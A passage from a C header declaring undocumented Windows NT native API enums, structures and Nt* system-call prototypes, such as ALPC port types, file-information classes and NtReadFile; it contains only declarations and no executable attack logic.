SectionHandle;\r\n\t\t\tULONGLONG UserProcessParametersNative;\r\n\t\t\tULONG UserProcessParametersWow64;\r\n\t\t\tULONG CurrentParameterFlags;\r\n\t\t\tULONGLONG PebAddressNative;\r\n\t\t\tULONG PebAddressWow64;\r\n\t\t\tULONGLONG ManifestAddress;\r\n\t\t\tULONG ManifestSize;\r\n\t\t} SuccessState;\r\n\t};\r\n} PS_CREATE_INFO, * PPS_CREATE_INFO;\r\n\r\ntypedef enum _MEMORY_INFORMATION_CLASS\r\n{\r\n\tMemoryBasicInformation,\r\n\tMemoryWorkingSetInformation,\r\n\tMemoryMappedFilenameInformation,\r\n\tMemoryRegionInformation,\r\n\tMemoryWorkingSetExInformation,\r\n\tMemorySharedCommitInformation,\r\n\tMemoryImageInformation,\r\n\tMemoryRegionInformationEx,\r\n\tMemoryPrivilegedBasicInformation,\r\n\tMemoryEnclaveImageInformation,\r\n\tMemoryBasicInformationCapped\r\n} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS;\r\n\r\ntypedef enum _MEMORY_RESERVE_TYPE\r\n{\r\n\tMemoryReserveUserApc,\r\n\tMemoryReserveIoCompletion,\r\n\tMemoryReserveTypeMax\r\n} MEMORY_RESERVE_TYPE, * PMEMORY_RESERVE_TYPE;\r\n\r\ntypedef enum _ALPC_PORT_INFORMATION_CLASS\r\n{\r\n\tAlpcBasicInformation,\r\n\tAlpcPortInformation,\r\n\tAlpcAssociateCompletionPortInformation,\r\n\tAlpcConnectedSIDInformation,\r\n\tAlpcServerInformation,\r\n\tAlpcMessageZoneInformation,\r\n\tAlpcRegisterCompletionListInformation,\r\n\tAlpcUnregisterCompletionListInformation,\r\n\tAlpcAdjustCompletionListConcurrencyCountInformation,\r\n\tAlpcRegisterCallbackInformation,\r\n\tAlpcCompletionListRundownInformation\r\n} ALPC_PORT_INFORMATION_CLASS, * PALPC_PORT_INFORMATION_CLASS;\r\n\r\ntypedef struct _ALPC_CONTEXT_ATTR\r\n{\r\n\tPVOID PortContext;\r\n\tPVOID MessageContext;\r\n\tULONG SequenceNumber;\r\n\tULONG MessageID;\r\n\tULONG CallbackID;\r\n} ALPC_CONTEXT_ATTR, * PALPC_CONTEXT_ATTR;\r\n\r\ntypedef struct _ALPC_DATA_VIEW_ATTR\r\n{\r\n\tULONG Flags;\r\n\tHANDLE SectionHandle;\r\n\tPVOID ViewBase;\r\n\tSIZE_T ViewSize;\r\n} ALPC_DATA_VIEW_ATTR, * PALPC_DATA_VIEW_ATTR;\r\n\r\ntypedef struct _ALPC_SECURITY_ATTR\r\n{\r\n\tULONG Flags;\r\n\tPSECURITY_QUALITY_OF_SERVICE SecurityQos;\r\n\tHANDLE ContextHandle;\r\n\tULONG Reserved1;\r\n\tULONG Reserved2;\r\n} ALPC_SECURITY_ATTR, * PALPC_SECURITY_ATTR;\r\n\r\ntypedef PVOID* PPVOID;\r\n\r\ntypedef enum _KPROFILE_SOURCE\r\n{\r\n\tProfileTime = 0,\r\n\tProfileAlignmentFixup = 1,\r\n\tProfileTotalIssues = 2,\r\n\tProfilePipelineDry = 3,\r\n\tProfileLoadInstructions = 4,\r\n\tProfilePipelineFrozen = 5,\r\n\tProfileBranchInstructions = 6,\r\n\tProfileTotalNonissues = 7,\r\n\tProfileDcacheMisses = 8,\r\n\tProfileIcacheMisses = 9,\r\n\tProfileCacheMisses = 10,\r\n\tProfileBranchMispredictions = 11,\r\n\tProfileStoreInstructions = 12,\r\n\tProfileFpInstructions = 13,\r\n\tProfileIntegerInstructions = 14,\r\n\tProfile2Issue = 15,\r\n\tProfile3Issue = 16,\r\n\tProfile4Issue = 17,\r\n\tProfileSpecialInstructions = 18,\r\n\tProfileTotalCycles = 19,\r\n\tProfileIcacheIssues = 20,\r\n\tProfileDcacheAccesses = 21,\r\n\tProfileMemoryBarrierCycles = 22,\r\n\tProfileLoadLinkedIssues = 23,\r\n\tProfileMaximum = 24,\r\n} KPROFILE_SOURCE, * PKPROFILE_SOURCE;\r\n\r\ntypedef enum _ALPC_MESSAGE_INFORMATION_CLASS\r\n{\r\n\tAlpcMessageSidInformation,\r\n\tAlpcMessageTokenModifiedIdInformation\r\n} ALPC_MESSAGE_INFORMATION_CLASS, * PALPC_MESSAGE_INFORMATION_CLASS;\r\n\r\ntypedef enum _WORKERFACTORYINFOCLASS\r\n{\r\n\tWorkerFactoryTimeout,\r\n\tWorkerFactoryRetryTimeout,\r\n\tWorkerFactoryIdleTimeout,\r\n\tWorkerFactoryBindingCount,\r\n\tWorkerFactoryThreadMinimum,\r\n\tWorkerFactoryThreadMaximum,\r\n\tWorkerFactoryPaused,\r\n\tWorkerFactoryBasicInformation,\r\n\tWorkerFactoryAdjustThreadGoal,\r\n\tWorkerFactoryCallbackType,\r\n\tWorkerFactoryStackInformation,\r\n\tMaxWorkerFactoryInfoClass\r\n} WORKERFACTORYINFOCLASS, * PWORKERFACTORYINFOCLASS;\r\n\r\ntypedef enum _MEMORY_PARTITION_INFORMATION_CLASS\r\n{\r\n\tSystemMemoryPartitionInformation,\r\n\tSystemMemoryPartitionMoveMemory,\r\n\tSystemMemoryPartitionAddPagefile,\r\n\tSystemMemoryPartitionCombineMemory,\r\n\tSystemMemoryPartitionInitialAddMemory,\r\n\tSystemMemoryPartitionGetMemoryEvents,\r\n\tSystemMemoryPartitionMax\r\n} MEMORY_PARTITION_INFORMATION_CLASS, * PMEMORY_PARTITION_INFORMATION_CLASS;\r\n\r\ntypedef enum _MUTANT_INFORMATION_CLASS\r\n{\r\n\tMutantBasicInformation,\r\n\tMutantOwnerInformation\r\n} MUTANT_INFORMATION_CLASS, * PMUTANT_INFORMATION_CLASS;\r\n\r\ntypedef enum _ATOM_INFORMATION_CLASS\r\n{\r\n\tAtomBasicInformation,\r\n\tAtomTableInformation\r\n} ATOM_INFORMATION_CLASS, * PATOM_INFORMATION_CLASS;\r\n\r\ntypedef enum _SHUTDOWN_ACTION {\r\n\tShutdownNoReboot,\r\n\tShutdownReboot,\r\n\tShutdownPowerOff\r\n} SHUTDOWN_ACTION;\r\n\r\ntypedef VOID(CALLBACK* PTIMER_APC_ROUTINE)(\r\n\tIN PVOID TimerContext,\r\n\tIN ULONG TimerLowValue,\r\n\tIN LONG TimerHighValue);\r\n\r\ntypedef enum _KEY_VALUE_INFORMATION_CLASS {\r\n\tKeyValueBasicInformation = 0,\r\n\tKeyValueFullInformation,\r\n\tKeyValuePartialInformation,\r\n\tKeyValueFullInformationAlign64,\r\n\tKeyValuePartialInformationAlign64,\r\n\tMaxKeyValueInfoClass\r\n} KEY_VALUE_INFORMATION_CLASS;\r\n\r\ntypedef LANGID* PLANGID;\r\n\r\ntypedef struct _PLUGPLAY_EVENT_BLOCK\r\n{\r\n\tGUID EventGuid;\r\n\tPLUGPLAY_EVENT_CATEGORY EventCategory;\r\n\tPULONG Result;\r\n\tULONG Flags;\r\n\tULONG TotalSize;\r\n\tPVOID DeviceObject;\r\n\r\n\tunion\r\n\t{\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tGUID ClassGuid;\r\n\t\t\tWCHAR SymbolicLinkName[1];\r\n\t\t} DeviceClass;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tWCHAR DeviceIds[1];\r\n\t\t} TargetDevice;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tWCHAR DeviceId[1];\r\n\t\t} InstallDevice;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tPVOID NotificationStructure;\r\n\t\t\tWCHAR DeviceIds[1];\r\n\t\t} CustomNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tPVOID Notification;\r\n\t\t} ProfileNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tULONG NotificationCode;\r\n\t\t\tULONG NotificationData;\r\n\t\t} PowerNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tPNP_VETO_TYPE VetoType;\r\n\t\t\tWCHAR DeviceIdVetoNameBuffer[1]; // DeviceIdVetoName\r\n\t\t} VetoNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tGUID BlockedDriverGuid;\r\n\t\t} BlockedDriverNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tWCHAR ParentId[1];\r\n\t\t} InvalidIDNotification;\r\n\t} u;\r\n} PLUGPLAY_EVENT_BLOCK, * PPLUGPLAY_EVENT_BLOCK;\r\n\r\ntypedef VOID(NTAPI* PIO_APC_ROUTINE) (\r\n\tIN PVOID ApcContext,\r\n\tIN PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG Reserved);\r\n\r\ntypedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;\r\n\r\ntypedef enum _DIRECTORY_NOTIFY_INFORMATION_CLASS\r\n{\r\n\tDirectoryNotifyInformation = 1,\r\n\tDirectoryNotifyExtendedInformation = 2,\r\n} DIRECTORY_NOTIFY_INFORMATION_CLASS, * PDIRECTORY_NOTIFY_INFORMATION_CLASS;\r\n\r\ntypedef enum _EVENT_INFORMATION_CLASS\r\n{\r\n\tEventBasicInformation\r\n} EVENT_INFORMATION_CLASS, * PEVENT_INFORMATION_CLASS;\r\n\r\ntypedef struct _ALPC_MESSAGE_ATTRIBUTES\r\n{\r\n\tunsigned long AllocatedAttributes;\r\n\tunsigned long ValidAttributes;\r\n} ALPC_MESSAGE_ATTRIBUTES, * PALPC_MESSAGE_ATTRIBUTES;\r\n\r\ntypedef struct _ALPC_PORT_ATTRIBUTES\r\n{\r\n\tULONG Flags;\r\n\tSECURITY_QUALITY_OF_SERVICE SecurityQos;\r\n\tSIZE_T MaxMessageLength;\r\n\tSIZE_T MemoryBandwidth;\r\n\tSIZE_T MaxPoolUsage;\r\n\tSIZE_T MaxSectionSize;\r\n\tSIZE_T MaxViewSize;\r\n\tSIZE_T MaxTotalSectionSize;\r\n\tULONG DupObjectTypes;\r\n#ifdef _WIN64\r\n\tULONG Reserved;\r\n#endif\r\n} ALPC_PORT_ATTRIBUTES, * PALPC_PORT_ATTRIBUTES;\r\n\r\ntypedef enum _IO_SESSION_STATE\r\n{\r\n\tIoSessionStateCreated = 1,\r\n\tIoSessionStateInitialized = 2,\r\n\tIoSessionStateConnected = 3,\r\n\tIoSessionStateDisconnected = 4,\r\n\tIoSessionStateDisconnectedLoggedOn = 5,\r\n\tIoSessionStateLoggedOn = 6,\r\n\tIoSessionStateLoggedOff = 7,\r\n\tIoSessionStateTerminated = 8,\r\n\tIoSessionStateMax = 9,\r\n} IO_SESSION_STATE, * PIO_SESSION_STATE;\r\n\r\ntypedef const WNF_STATE_NAME* PCWNF_STATE_NAME;\r\n\r\ntypedef const WNF_TYPE_ID* PCWNF_TYPE_ID;\r\n\r\ntypedef struct _WNF_DELIVERY_DESCRIPTOR\r\n{\r\n\tunsigned __int64 SubscriptionId;\r\n\tWNF_STATE_NAME StateName;\r\n\tunsigned long ChangeStamp;\r\n\tunsigned long StateDataSize;\r\n\tunsigned long EventMask;\r\n\tWNF_TYPE_ID TypeId;\r\n\tunsigned long StateDataOffset;\r\n} WNF_DELIVERY_DESCRIPTOR, * PWNF_DELIVERY_DESCRIPTOR;\r\n\r\ntypedef enum _DEBUG_CONTROL_CODE\r\n{\r\n\tSysDbgQueryModuleInformation = 0,\r\n\tSysDbgQueryTraceInformation = 1,\r\n\tSysDbgSetTracePoint = 2,\r\n\tSysDbgSetSpecialCall = 3,\r\n\tSysDbgClearSpecialCalls = 4,\r\n\tSysDbgQuerySpecialCalls = 5,\r\n\tSysDbgBreakPoint = 6,\r\n\tSysDbgQueryVersion = 7,\r\n\tSysDbgReadVirtual = 8,\r\n\tSysDbgWriteVirtual = 9,\r\n\tSysDbgReadPhysical = 10,\r\n\tSysDbgWritePhysical = 11,\r\n\tSysDbgReadControlSpace = 12,\r\n\tSysDbgWriteControlSpace = 13,\r\n\tSysDbgReadIoSpace = 14,\r\n\tSysDbgWriteIoSpace = 15,\r\n\tSysDbgReadMsr = 16,\r\n\tSysDbgWriteMsr = 17,\r\n\tSysDbgReadBusData = 18,\r\n\tSysDbgWriteBusData = 19,\r\n\tSysDbgCheckLowMemory = 20,\r\n\tSysDbgEnableKernelDebugger = 21,\r\n\tSysDbgDisableKernelDebugger = 22,\r\n\tSysDbgGetAutoKdEnable = 23,\r\n\tSysDbgSetAutoKdEnable = 24,\r\n\tSysDbgGetPrintBufferSize = 25,\r\n\tSysDbgSetPrintBufferSize = 26,\r\n\tSysDbgGetKdUmExceptionEnable = 27,\r\n\tSysDbgSetKdUmExceptionEnable = 28,\r\n\tSysDbgGetTriageDump = 29,\r\n\tSysDbgGetKdBlockEnable = 30,\r\n\tSysDbgSetKdBlockEnable = 31\r\n} DEBUG_CONTROL_CODE, * PDEBUG_CONTROL_CODE;\r\n\r\ntypedef struct _PORT_MESSAGE\r\n{\r\n\tunion\r\n\t{\r\n\t\tunion\r\n\t\t{\r\n\t\t\tstruct\r\n\t\t\t{\r\n\t\t\t\tshort DataLength;\r\n\t\t\t\tshort TotalLength;\r\n\t\t\t} s1;\r\n\t\t\tunsigned long Length;\r\n\t\t};\r\n\t} u1;\r\n\tunion\r\n\t{\r\n\t\tunion\r\n\t\t{\r\n\t\t\tstruct\r\n\t\t\t{\r\n\t\t\t\tshort Type;\r\n\t\t\t\tshort DataInfoOffset;\r\n\t\t\t} s2;\r\n\t\t\tunsigned long ZeroInit;\r\n\t\t};\r\n\t} u2;\r\n\tunion\r\n\t{\r\n\t\tCLIENT_ID ClientId;\r\n\t\tdouble DoNotUseThisField;\r\n\t};\r\n\tunsigned long MessageId;\r\n\tunion\r\n\t{\r\n\t\tunsigned __int64 ClientViewSize;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tunsigned long CallbackId;\r\n\t\t\tlong __PADDING__[1];\r\n\t\t};\r\n\t};\r\n} PORT_MESSAGE, * PPORT_MESSAGE;\r\n\r\ntypedef struct FILE_BASIC_INFORMATION\r\n{\r\n\tLARGE_INTEGER CreationTime;\r\n\tLARGE_INTEGER LastAccessTime;\r\n\tLARGE_INTEGER LastWriteTime;\r\n\tLARGE_INTEGER ChangeTime;\r\n\tULONG FileAttributes;\r\n} FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION;\r\n\r\ntypedef struct _PORT_SECTION_READ\r\n{\r\n\tULONG Length;\r\n\tULONG ViewSize;\r\n\tULONG ViewBase;\r\n} PORT_SECTION_READ, * PPORT_SECTION_READ;\r\n\r\ntypedef struct _PORT_SECTION_WRITE\r\n{\r\n\tULONG Length;\r\n\tHANDLE SectionHandle;\r\n\tULONG SectionOffset;\r\n\tULONG ViewSize;\r\n\tPVOID ViewBase;\r\n\tPVOID TargetViewBase;\r\n} PORT_SECTION_WRITE, * PPORT_SECTION_WRITE;\r\n\r\ntypedef enum _TIMER_TYPE\r\n{\r\n\tNotificationTimer,\r\n\tSynchronizationTimer\r\n} TIMER_TYPE, * PTIMER_TYPE;\r\n\r\ntypedef struct _BOOT_ENTRY\r\n{\r\n\tULONG Version;\r\n\tULONG Length;\r\n\tULONG Id;\r\n\tULONG Attributes;\r\n\tULONG FriendlyNameOffset;\r\n\tULONG BootFilePathOffset;\r\n\tULONG OsOptionsLength;\r\n\tUCHAR OsOptions[ANYSIZE_ARRAY];\r\n} BOOT_ENTRY, * PBOOT_ENTRY;\r\n\r\ntypedef struct _EFI_DRIVER_ENTRY\r\n{\r\n\tULONG Version;\r\n\tULONG Length;\r\n\tULONG Id;\r\n\tULONG Attributes;\r\n\tULONG FriendlyNameOffset;\r\n\tULONG DriverFilePathOffset;\r\n} EFI_DRIVER_ENTRY, * PEFI_DRIVER_ENTRY;\r\n\r\ntypedef USHORT RTL_ATOM, * PRTL_ATOM;\r\n\r\ntypedef enum _TIMER_SET_INFORMATION_CLASS\r\n{\r\n\tTimerSetCoalescableTimer,\r\n\tMaxTimerInfoClass\r\n} TIMER_SET_INFORMATION_CLASS, * PTIMER_SET_INFORMATION_CLASS;\r\n\r\ntypedef enum _FSINFOCLASS\r\n{\r\n\tFileFsVolumeInformation = 1,\r\n\tFileFsLabelInformation = 2,\r\n\tFileFsSizeInformation = 3,\r\n\tFileFsDeviceInformation = 4,\r\n\tFileFsAttributeInformation = 5,\r\n\tFileFsControlInformation = 6,\r\n\tFileFsFullSizeInformation = 7,\r\n\tFileFsObjectIdInformation = 8,\r\n\tFileFsDriverPathInformation = 9,\r\n\tFileFsVolumeFlagsInformation = 10,\r\n\tFileFsSectorSizeInformation = 11,\r\n\tFileFsDataCopyInformation = 12,\r\n\tFileFsMetadataSizeInformation = 13,\r\n\tFileFsFullSizeInformationEx = 14,\r\n\tFileFsMaximumInformation = 15,\r\n} FSINFOCLASS, * PFSINFOCLASS;\r\n\r\ntypedef enum _WAIT_TYPE\r\n{\r\n\tWaitAll = 0,\r\n\tWaitAny = 1\r\n} WAIT_TYPE, * PWAIT_TYPE;\r\n\r\ntypedef struct _USER_STACK\r\n{\r\n\tPVOID FixedStackBase;\r\n\tPVOID FixedStackLimit;\r\n\tPVOID ExpandableStackBase;\r\n\tPVOID ExpandableStackLimit;\r\n\tPVOID ExpandableStackBottom;\r\n} USER_STACK, * PUSER_STACK;\r\n\r\ntypedef enum _SECTION_INFORMATION_CLASS\r\n{\r\n\tSectionBasicInformation,\r\n\tSectionImageInformation,\r\n} SECTION_INFORMATION_CLASS, * PSECTION_INFORMATION_CLASS;\r\n\r\ntypedef enum _APPHELPCACHESERVICECLASS\r\n{\r\n\tApphelpCacheServiceLookup = 0,\r\n\tApphelpCacheServiceRemove = 1,\r\n\tApphelpCacheServiceUpdate = 2,\r\n\tApphelpCacheServiceFlush = 3,\r\n\tApphelpCacheServiceDump = 4,\r\n\tApphelpDBGReadRegistry = 0x100,\r\n\tApphelpDBGWriteRegistry = 0x101,\r\n} APPHELPCACHESERVICECLASS, * PAPPHELPCACHESERVICECLASS;\r\n\r\ntypedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION\r\n{\r\n\tUSHORT Version;\r\n\tUSHORT Reserved;\r\n\tULONG AttributeCount;\r\n\tunion\r\n\t{\r\n\t\tPTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1;\r\n\t} Attribute;\r\n} TOKEN_SECURITY_ATTRIBUTES_INFORMATION, * PTOKEN_SECURITY_ATTRIBUTES_INFORMATION;\r\n\r\ntypedef struct _FILE_IO_COMPLETION_INFORMATION\r\n{\r\n\tPVOID KeyContext;\r\n\tPVOID ApcContext;\r\n\tIO_STATUS_BLOCK IoStatusBlock;\r\n} FILE_IO_COMPLETION_INFORMATION, * PFILE_IO_COMPLETION_INFORMATION;\r\n\r\ntypedef PVOID PT2_CANCEL_PARAMETERS;\r\n\r\ntypedef enum _THREADINFOCLASS\r\n{\r\n\tThreadBasicInformation,\r\n\tThreadTimes,\r\n\tThreadPriority,\r\n\tThreadBasePriority,\r\n\tThreadAffinityMask,\r\n\tThreadImpersonationToken,\r\n\tThreadDescriptorTableEntry,\r\n\tThreadEnableAlignmentFaultFixup,\r\n\tThreadEventPair_Reusable,\r\n\tThreadQuerySetWin32StartAddress,\r\n\tThreadZeroTlsCell,\r\n\tThreadPerformanceCount,\r\n\tThreadAmILastThread,\r\n\tThreadIdealProcessor,\r\n\tThreadPriorityBoost,\r\n\tThreadSetTlsArrayAddress,\r\n\tThreadIsIoPending,\r\n\tThreadHideFromDebugger,\r\n\tThreadBreakOnTermination,\r\n\tMaxThreadInfoClass\r\n} THREADINFOCLASS, * PTHREADINFOCLASS;\r\n\r\ntypedef enum _OBJECT_INFORMATION_CLASS\r\n{\r\n\tObjectBasicInformation,\r\n\tObjectNameInformation,\r\n\tObjectTypeInformation,\r\n\tObjectAllTypesInformation,\r\n\tObjectHandleInformation\r\n} OBJECT_INFORMATION_CLASS, * POBJECT_INFORMATION_CLASS;\r\n\r\ntypedef enum _FILE_INFORMATION_CLASS\r\n{\r\n\tFileDirectoryInformation = 1,\r\n\tFileFullDirectoryInformation = 2,\r\n\tFileBothDirectoryInformation = 3,\r\n\tFileBasicInformation = 4,\r\n\tFileStandardInformation = 5,\r\n\tFileInternalInformation = 6,\r\n\tFileEaInformation = 7,\r\n\tFileAccessInformation = 8,\r\n\tFileNameInformation = 9,\r\n\tFileRenameInformation = 10,\r\n\tFileLinkInformation = 11,\r\n\tFileNamesInformation = 12,\r\n\tFileDispositionInformation = 13,\r\n\tFilePositionInformation = 14,\r\n\tFileFullEaInformation = 15,\r\n\tFileModeInformation = 16,\r\n\tFileAlignmentInformation = 17,\r\n\tFileAllInformation = 18,\r\n\tFileAllocationInformation = 19,\r\n\tFileEndOfFileInformation = 20,\r\n\tFileAlternateNameInformation = 21,\r\n\tFileStreamInformation = 22,\r\n\tFilePipeInformation = 23,\r\n\tFilePipeLocalInformation = 24,\r\n\tFilePipeRemoteInformation = 25,\r\n\tFileMailslotQueryInformation = 26,\r\n\tFileMailslotSetInformation = 27,\r\n\tFileCompressionInformation = 28,\r\n\tFileObjectIdInformation = 29,\r\n\tFileCompletionInformation = 30,\r\n\tFileMoveClusterInformation = 31,\r\n\tFileQuotaInformation = 32,\r\n\tFileReparsePointInformation = 33,\r\n\tFileNetworkOpenInformation = 34,\r\n\tFileAttributeTagInformation = 35,\r\n\tFileTrackingInformation = 36,\r\n\tFileIdBothDirectoryInformation = 37,\r\n\tFileIdFullDirectoryInformation = 38,\r\n\tFileValidDataLengthInformation = 39,\r\n\tFileShortNameInformation = 40,\r\n\tFileIoCompletionNotificationInformation = 41,\r\n\tFileIoStatusBlockRangeInformation = 42,\r\n\tFileIoPriorityHintInformation = 43,\r\n\tFileSfioReserveInformation = 44,\r\n\tFileSfioVolumeInformation = 45,\r\n\tFileHardLinkInformation = 46,\r\n\tFileProcessIdsUsingFileInformation = 47,\r\n\tFileNormalizedNameInformation = 48,\r\n\tFileNetworkPhysicalNameInformation = 49,\r\n\tFileIdGlobalTxDirectoryInformation = 50,\r\n\tFileIsRemoteDeviceInformation = 51,\r\n\tFileUnusedInformation = 52,\r\n\tFileNumaNodeInformation = 53,\r\n\tFileStandardLinkInformation = 54,\r\n\tFileRemoteProtocolInformation = 55,\r\n\tFileRenameInformationBypassAccessCheck = 56,\r\n\tFileLinkInformationBypassAccessCheck = 57,\r\n\tFileVolumeNameInformation = 58,\r\n\tFileIdInformation = 59,\r\n\tFileIdExtdDirectoryInformation = 60,\r\n\tFileReplaceCompletionInformation = 61,\r\n\tFileHardLinkFullIdInformation = 62,\r\n\tFileIdExtdBothDirectoryInformation = 63,\r\n\tFileDispositionInformationEx = 64,\r\n\tFileRenameInformationEx = 65,\r\n\tFileRenameInformationExBypassAccessCheck = 66,\r\n\tFileMaximumInformation = 67,\r\n} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;\r\n\r\ntypedef enum _KEY_INFORMATION_CLASS\r\n{\r\n\tKeyBasicInformation = 0,\r\n\tKeyNodeInformation = 1,\r\n\tKeyFullInformation = 2,\r\n\tKeyNameInformation = 3,\r\n\tKeyCachedInformation = 4,\r\n\tKeyFlagsInformation = 5,\r\n\tKeyVirtualizationInformation = 6,\r\n\tKeyHandleTagsInformation = 7,\r\n\tMaxKeyInfoClass = 8\r\n} KEY_INFORMATION_CLASS, * PKEY_INFORMATION_CLASS;\r\n\r\ntypedef struct _OBJECT_ATTRIBUTES\r\n{\r\n\tULONG Length;\r\n\tHANDLE RootDirectory;\r\n\tPUNICODE_STRING ObjectName;\r\n\tULONG Attributes;\r\n\tPVOID SecurityDescriptor;\r\n\tPVOID SecurityQualityOfService;\r\n} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;\r\n\r\ntypedef enum _TIMER_INFORMATION_CLASS\r\n{\r\n\tTimerBasicInformation\r\n} TIMER_INFORMATION_CLASS, * PTIMER_INFORMATION_CLASS;\r\n\r\ntypedef struct _KCONTINUE_ARGUMENT\r\n{\r\n\tKCONTINUE_TYPE ContinueType;\r\n\tULONG ContinueFlags;\r\n\tULONGLONG Reserved[2];\r\n} KCONTINUE_ARGUMENT, * PKCONTINUE_ARGUMENT;\r\n\r\nEXTERN_C NTSTATUS NtAccessCheck(\r\n\tIN PSECURITY_DESCRIPTOR pSecurityDescriptor,\r\n\tIN HANDLE ClientToken,\r\n\tIN ACCESS_MASK DesiaredAccess,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tOUT PPRIVILEGE_SET PrivilegeSet OPTIONAL,\r\n\tIN OUT PULONG PrivilegeSetLength,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PBOOLEAN AccessStatus);\r\n\r\nEXTERN_C NTSTATUS NtWorkerFactoryWorkerReady(\r\n\tIN HANDLE WorkerFactoryHandle);\r\n\r\nEXTERN_C NTSTATUS NtAcceptConnectPort(\r\n\tOUT PHANDLE ServerPortHandle,\r\n\tIN ULONG AlternativeReceivePortHandle OPTIONAL,\r\n\tIN PPORT_MESSAGE ConnectionReply,\r\n\tIN BOOLEAN AcceptConnection,\r\n\tIN OUT PPORT_SECTION_WRITE ServerSharedMemory OPTIONAL,\r\n\tOUT PPORT_SECTION_READ ClientSharedMemory OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtMapUserPhysicalPagesScatter(\r\n\tIN PVOID VirtualAddresses,\r\n\tIN PULONG NumberOfPages,\r\n\tIN PULONG UserPfnArray OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForSingleObject(\r\n\tIN HANDLE ObjectHandle,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER TimeOut OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCallbackReturn(\r\n\tIN PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputLength,\r\n\tIN NTSTATUS Status);\r\n\r\nEXTERN_C NTSTATUS NtReadFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tOUT PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tIN PLARGE_INTEGER ByteOffset OPTIONAL,\r\n\tIN PULONG Key OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDeviceIoControlFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG IoControlCode,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength);\r\n\r\nEXTERN_C NTSTATUS NtWriteFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tIN PLARGE_INTEGER ByteOffset OPTIONAL,\r\n\tIN PULONG Key OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRemoveIoCompletion(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tOUT PULONG KeyContext,\r\n\tOUT PULONG ApcContext,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtReleaseSemaphore(\r\n\tIN HANDLE SemaphoreHandle,\r\n\tIN LONG ReleaseCount,\r\n\tOUT PLONG PreviousCount OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtReplyWaitReceivePort(\r\n\tIN HANDLE PortHandle,\r\n\tOUT PVOID PortContext OPTIONAL,\r\n\tIN PPORT_MESSAGE ReplyMessage OPTIONAL,\r\n\tOUT PPORT_MESSAGE ReceiveMessage);\r\n\r\nEXTERN_C NTSTATUS NtReplyPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE ReplyMessage);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN THREADINFOCLASS ThreadInformationClass,\r\n\tIN PVOID ThreadInformation,\r\n\tIN ULONG ThreadInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetEvent(\r\n\tIN HANDLE EventHandle,\r\n\tOUT PULONG PreviousState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtClose(\r\n\tIN HANDLE Handle);\r\n\r\nEXTERN_C NTSTATUS NtQueryObject(\r\n\tIN HANDLE Handle,\r\n\tIN OBJECT_INFORMATION_CLASS ObjectInformationClass,\r\n\tOUT PVOID ObjectInformation OPTIONAL,\r\n\tIN ULONG ObjectInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtOpenKey(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtEnumerateValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN ULONG Index,\r\n\tIN 